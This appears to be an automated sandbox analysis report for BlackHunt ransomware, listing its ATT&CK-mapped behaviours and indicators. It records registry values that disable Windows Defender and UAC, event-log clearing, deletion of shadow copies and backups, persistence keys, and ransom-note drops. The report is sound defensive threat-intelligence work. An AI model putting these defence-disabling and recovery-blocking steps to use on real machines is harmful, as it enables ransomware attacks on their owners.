f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

Processes:

f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe

Clears Windows event logs 1 TTPs 5 IoCs
evasion ransomware

Indicator Removal on Host
T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid process

3748 wevtutil.exe
1192 wevtutil.exe
4404 wevtutil.exe
3032 wevtutil.exe
2348 wevtutil.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid process

2060 bcdedit.exe
2528 bcdedit.exe
2876 bcdedit.exe
5004 bcdedit.exe
Deletes backup catalog 3 TTPs 2 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exewbadmin.exe

pid process

5072 wbadmin.exe
3772 wbadmin.exe
Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

pid	process
3748	wevtutil.exe
1192	wevtutil.exe
4404	wevtutil.exe
3032	wevtutil.exe
2348	wevtutil.exe

pid	process
2060	bcdedit.exe
2528	bcdedit.exe
2876	bcdedit.exe
5004	bcdedit.exe

pid	process
5072	wbadmin.exe
3772	wbadmin.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

cmd.exef725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityService = "C:\\Users\\Admin\\AppData\\Local\\Temp\\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups "	reg.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

Processes:

f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exefsutil.exe

description	ioc	process
File opened (read-only)	\??\A:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\G:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\K:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\Q:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\T:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\Y:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\B:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\N:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\M:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\O:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\J:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\V:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\Z:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\X:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\M:	fsutil.exe
File opened (read-only)	\??\W:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\R:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\U:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\S:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\F:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\H:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\L:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\E:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\I:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened (read-only)	\??\P:	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 ip-api.com

flow	ioc
4	ip-api.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

Processes:

f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg"	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe

Drops file in Program Files directory 64 IoCs

Processes:

f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_ReadMe.txt	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\A12_AddBlue@1x.png	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\it-it\#BlackHunt_ReadMe.txt	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-ae\ui-strings.js	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\da-dk\#BlackHunt_ReadMe.hta	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files\7-Zip\Lang\gl.txt	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files\VideoLAN\VLC\lua\meta\#BlackHunt_ReadMe.txt	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\VideoLAN Website.url	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_anonymoususer_18.svg	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\#BlackHunt_ReadMe.hta	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\de-de\#BlackHunt_ReadMe.txt	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\bin\stopNetworkServer	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\#BlackHunt_ReadMe.txt	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ar-ae\#BlackHunt_ReadMe.hta	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\#BlackHunt_ReadMe.hta	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pt-br\#BlackHunt_Private.key	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_ReadMe.hta	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\#BlackHunt_Private.key	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-ae\#BlackHunt_Private.key	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\#BlackHunt_Private.key	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaSansDemiBold.ttf	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-sl\#BlackHunt_ReadMe.txt	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\#BlackHunt_ReadMe.txt	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ja-jp\#BlackHunt_Private.key	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\es-es\ui-strings.js	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nb-no\#BlackHunt_ReadMe.hta	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Common Files\Services\#BlackHunt_Private.key	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_zh_CN.jar	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_zh_CN.jar	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_ja.jar	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\#BlackHunt_ReadMe.txt	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\locales\en-US.pak	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nl-nl\ui-strings.js	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\ui-strings.js	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#BlackHunt_Private.key	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Google\CrashReports\#BlackHunt_ReadMe.txt	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\#BlackHunt_ReadMe.txt	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ja-jp\#BlackHunt_Private.key	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\S_ThumbDownOutline_22_N.svg	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\#BlackHunt_ReadMe.txt	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ja-jp\ui-strings.js	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nb-no\#BlackHunt_ReadMe.hta	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\da-dk\#BlackHunt_ReadMe.hta	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pl-pl\ui-strings.js	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\#BlackHunt_ReadMe.txt	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons.png	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ru-ru\#BlackHunt_ReadMe.txt	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files-select\#BlackHunt_ReadMe.txt	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ja-jp\#BlackHunt_ReadMe.hta	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner_mini.gif	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_download_pdf_18.svg	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\images\#BlackHunt_ReadMe.txt	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ja-jp\#BlackHunt_ReadMe.txt	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\css\#BlackHunt_Private.key	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fi-fi\#BlackHunt_ReadMe.hta	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_ja_4.4.0.v20140623020002.jar	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\#BlackHunt_Private.key	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\#BlackHunt_ReadMe.txt	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

vds.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3732 schtasks.exe
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

476 vssadmin.exe
4168 vssadmin.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4532 taskkill.exe

pid	process
3732	schtasks.exe

pid	process
476	vssadmin.exe
4168	vssadmin.exe

pid	process
4532	taskkill.exe

Modifies registry class 9 IoCs

Processes:

reg.exereg.exereg.exereg.execmd.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Black	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Black\	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.Black\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Black\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.Black	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.Black\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.Black\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Black\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico"	reg.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe

pid	process
4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe

pid process

4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

vssvc.exewbengine.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exetaskkill.exe

description	pid	process
Token: SeBackupPrivilege	3992	vssvc.exe
Token: SeRestorePrivilege	3992	vssvc.exe
Token: SeAuditPrivilege	3992	vssvc.exe
Token: SeBackupPrivilege	4116	wbengine.exe
Token: SeRestorePrivilege	4116	wbengine.exe
Token: SeSecurityPrivilege	4116	wbengine.exe
Token: SeSecurityPrivilege	3748	wevtutil.exe
Token: SeBackupPrivilege	3748	wevtutil.exe
Token: SeSecurityPrivilege	1192	wevtutil.exe
Token: SeBackupPrivilege	1192	wevtutil.exe
Token: SeSecurityPrivilege	4404	wevtutil.exe
Token: SeBackupPrivilege	4404	wevtutil.exe
Token: SeSecurityPrivilege	3032	wevtutil.exe
Token: SeBackupPrivilege	3032	wevtutil.exe
Token: SeSecurityPrivilege	2348	wevtutil.exe
Token: SeBackupPrivilege	2348	wevtutil.exe
Token: SeDebugPrivilege	4532	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4848 wrote to memory of 2284	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 2284	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 64	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 64	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 1908	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 1908	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 2284 wrote to memory of 3756	2284	cmd.exe	reg.exe
PID 2284 wrote to memory of 3756	2284	cmd.exe	reg.exe
PID 4848 wrote to memory of 1756	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 1756	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 4244	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 4244	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 1908 wrote to memory of 5068	1908	cmd.exe	reg.exe
PID 1908 wrote to memory of 5068	1908	cmd.exe	reg.exe
PID 4848 wrote to memory of 5084	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 5084	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 64 wrote to memory of 4616	64	cmd.exe	reg.exe
